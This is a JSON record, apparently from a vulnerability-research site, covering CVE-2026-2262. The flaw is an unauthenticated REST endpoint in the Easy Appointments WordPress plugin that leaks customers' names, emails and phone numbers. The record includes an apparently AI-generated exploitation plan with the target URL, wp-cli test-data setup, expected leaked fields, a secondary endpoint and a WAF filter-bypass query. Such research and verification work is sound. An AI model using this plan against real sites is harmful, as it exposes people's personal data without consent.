[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fRODPlQRFqhKws12kY5J-sfKTZSQJkQOgt_L_QBe6aZ8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":37},"CVE-2026-2262","easy-appointments-unauthenticated-sensitive-information-exposure-via-rest-api","Easy Appointments \u003C= 3.12.21 - Unauthenticated Sensitive Information Exposure via REST API","The Easy Appointments plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.12.21 via the `\u002Fwp-json\u002Fwp\u002Fv2\u002Feablocks\u002Fea_appointments\u002F` REST API endpoint. This is due to the endpoint being registered with `'permission_callback' => '__return_true'`, which allows access without any authentication or authorization checks. This makes it possible for unauthenticated attackers to extract sensitive customer appointment data including full names, email addresses, phone numbers, IP addresses, appointment descriptions, and pricing information.","easy-appointments",null,"\u003C=3.12.21","3.12.22","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2026-04-17 10:47:32","2026-04-17 23:26:48",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fe681aa8e-522e-4092-aa1f-8ada3097c8d6?source=api-prod",1,[22,23,24,25,26,27,28,29],"css\u002Fadmin.css","ea-blocks\u002Fbuild\u002Fea-fullcalendar\u002Ffrontend.asset.php","ea-blocks\u002Fbuild\u002Fea-fullcalendar\u002Ffrontend.js","ea-blocks\u002Fbuild\u002Fea-fullcalendar\u002Findex.asset.php","ea-blocks\u002Fbuild\u002Fea-fullcalendar\u002Findex.js","ea-blocks\u002Fea-blocks.php","ea-blocks\u002Fsrc\u002Fea-fullcalendar\u002Fedit.js","ea-blocks\u002Fsrc\u002Fea-fullcalendar\u002Fview.js","researched",false,3,"# Vulnerability Research Plan: CVE-2026-2262 - Easy Appointments Sensitive Information Exposure\n\n## 1. Vulnerability Summary\nThe **Easy Appointments** plugin for WordPress is vulnerable to **Sensitive Information Exposure** in versions up to and including 3.12.21. The vulnerability exists because the plugin registers a REST API endpoint `\u002Fwp-json\u002Fwp\u002Fv2\u002Feablocks\u002Fea_appointments\u002F` with a `'permission_callback'` set to `'__return_true'`. This allows any unauthenticated user to query the endpoint and retrieve the full contents of the `ea_appointments` and `ea_fields` database tables, which contain sensitive customer data such as full names, email addresses, phone numbers, and appointment descriptions.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `GET \u002Fwp-json\u002Fwp\u002Fv2\u002Feablocks\u002Fea_appointments\u002F`\n*   **Authentication:** None Required (Unauthenticated).\n*   **Permissions:** Open to all users via `permission_callback => '__return_true'`.\n*   **Parameters:** \n    *   `location` (optional, integer)\n    *   `service` (optional, integer)\n    *   `worker` (optional, integer)\n    *   `search` (optional, string)\n*   **Preconditions:** The plugin must be active. At least one appointment must exist in the database for the exposure to be demonstrable.\n\n## 3. Code Flow\n1.  **Registration:** In `ea-blocks\u002Fea-blocks.php`, the `rest_api_init` action (lines 216-222) registers the route:\n    ```php\n    register_rest_route('wp\u002Fv2\u002Feablocks', '\u002Fea_appointments\u002F', [\n        'methods'  => 'GET',\n        'callback' => 'easy_ea_block_get_appointments',\n        'permission_callback' => '__return_true',\n    ]);\n    ```\n2.  **Callback Execution:** When the endpoint is hit, `easy_ea_block_get_appointments` is called (lines 119-146). It extracts parameters and calls `easy_ea_block_get_all_appointments($data)`.\n3.  **Data Retrieval:** `easy_ea_block_get_all_appointments` (lines 148-189) performs a `SELECT *` on the appointments table:\n    ```php\n    $query = \"SELECT * FROM $tableName WHERE 1 {$location}{$service}{$worker}{$status}{$search} ORDER BY id DESC\";\n    $apps = $wpdb->get_results($sql, OBJECT_K);\n    ```\n4.  **Metadata Enrichment:** It then calls `easy_ea_block_get_fields_for_apps($ids)` (lines 201-212), which joins the meta-fields and field values tables to retrieve specific customer details (Name, Email, Phone, etc.).\n5.  **Response:** The combined data object is returned as a JSON response to the unauthenticated requester.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability does **not** require a WordPress nonce. The REST API endpoint is registered with `'permission_callback' => '__return_true'`, and the method is `GET`. WordPress REST API nonces (`_wpnonce`) are primarily used for CSRF protection on state-changing requests (POST\u002FPUT\u002FDELETE) or when the `permission_callback` requires a logged-in session. For this specific \"Sensitive Information Exposure\" vulnerability, an unauthenticated `GET` request will succeed without any headers or tokens.\n\n## 5. Exploitation Strategy\n1.  **Target URL:** `http:\u002F\u002F\u003Ctarget-ip>\u002Fwp-json\u002Fwp\u002Fv2\u002Feablocks\u002Fea_appointments\u002F`\n2.  **Method:** `GET`\n3.  **Request tool:** `http_request`\n4.  **Payload:** None required. Optionally, append `?search=` to verify filtering, but a bare request is sufficient.\n5.  **Headers:** None required.\n\n## 6. Test Data Setup\nTo prove the exploit, the environment must contain sensitive data. Use `wp-cli` to simulate a user booking:\n1.  **Create Location\u002FService\u002FWorker:**\n    ```bash\n    # These tables are created on plugin activation. Use wp db query to insert prerequisites.\n    wp db query \"INSERT INTO wp_ea_locations (name) VALUES ('Test Clinic');\"\n    wp db query \"INSERT INTO wp_ea_services (name) VALUES ('General Checkup');\"\n    wp db query \"INSERT INTO wp_ea_staff (name) VALUES ('Dr. Smith');\"\n    wp db query \"INSERT INTO wp_ea_connections (location, service, worker, is_working) VALUES (1, 1, 1, 1);\"\n    ```\n2.  **Create Meta Fields:**\n    ```bash\n    wp db query \"INSERT INTO wp_ea_meta_fields (id, slug, label, type) VALUES (1, 'email', 'Email', 'text'), (2, 'phone', 'Phone', 'text'), (3, 'name', 'Name', 'text');\"\n    ```\n3.  **Create an Appointment with Sensitive Info:**\n    ```bash\n    wp db query \"INSERT INTO wp_ea_appointments (id, location, service, worker, date, start, end, status) VALUES (1337, 1, 1, 1, '2025-05-20', '10:00:00', '10:30:00', 'confirmed');\"\n    wp db query \"INSERT INTO wp_ea_fields (app_id, field_id, value) VALUES (1337, 1, 'victim@example.com'), (1337, 2, '555-0199'), (1337, 3, 'John Doe');\"\n    ```\n\n## 7. Expected Results\nA successful exploit will return a `200 OK` response with a JSON array. Each element in the array will represent an appointment and **must** contain:\n*   `id`: The appointment ID (e.g., `1337`).\n*   `name`: \"John Doe\" (Retrieved via `easy_ea_block_get_fields_for_apps`).\n*   `email`: \"victim@example.com\".\n*   `phone`: \"555-0199\".\n*   Internal fields like `location`, `service`, `worker`, `date`, `start`, `end`.\n\n## 8. Verification Steps\n1.  **HTTP Check:** Inspect the response from the `http_request` tool for the string `\"victim@example.com\"` and `\"John Doe\"`.\n2.  **Database Correlation:** Use `wp-cli` to verify the data exists in the database to ensure the response matches the \"sensitive\" source:\n    ```bash\n    wp db query \"SELECT * FROM wp_ea_fields WHERE app_id = 1337\"\n    ```\n\n## 9. Alternative Approaches\nIf the main endpoint `\u002Fea_appointments\u002F` is partially restricted or fails, check the secondary endpoint registered in the same block:\n*   **Secondary Endpoint:** `GET \u002Fwp-json\u002Fwp\u002Fv2\u002Feablocks\u002Fget_ea_options\u002F`\n*   **Analysis:** This endpoint (lines 106-110, lines 225-270) is also registered with `__return_true`. While it primarily returns configuration options for locations, services, and staff, it may leak the internal structure and IDs of the booking system, facilitating more targeted queries to the main vulnerable endpoint.\n*   **Filter Bypass:** If the plugin uses any custom `WAF` or security plugins, try adding a `search` parameter: `\u002Fwp-json\u002Fwp\u002Fv2\u002Feablocks\u002Fea_appointments\u002F?search=@` (to target emails).","gemini-3-flash-preview","2026-04-20 20:11:32","2026-04-20 20:11:53",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","3.12.21","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Feasy-appointments\u002Ftags\u002F3.12.21","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Feasy-appointments.3.12.21.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Feasy-appointments\u002Ftags\u002F3.12.22","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Feasy-appointments.3.12.22.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Feasy-appointments\u002Ftags"]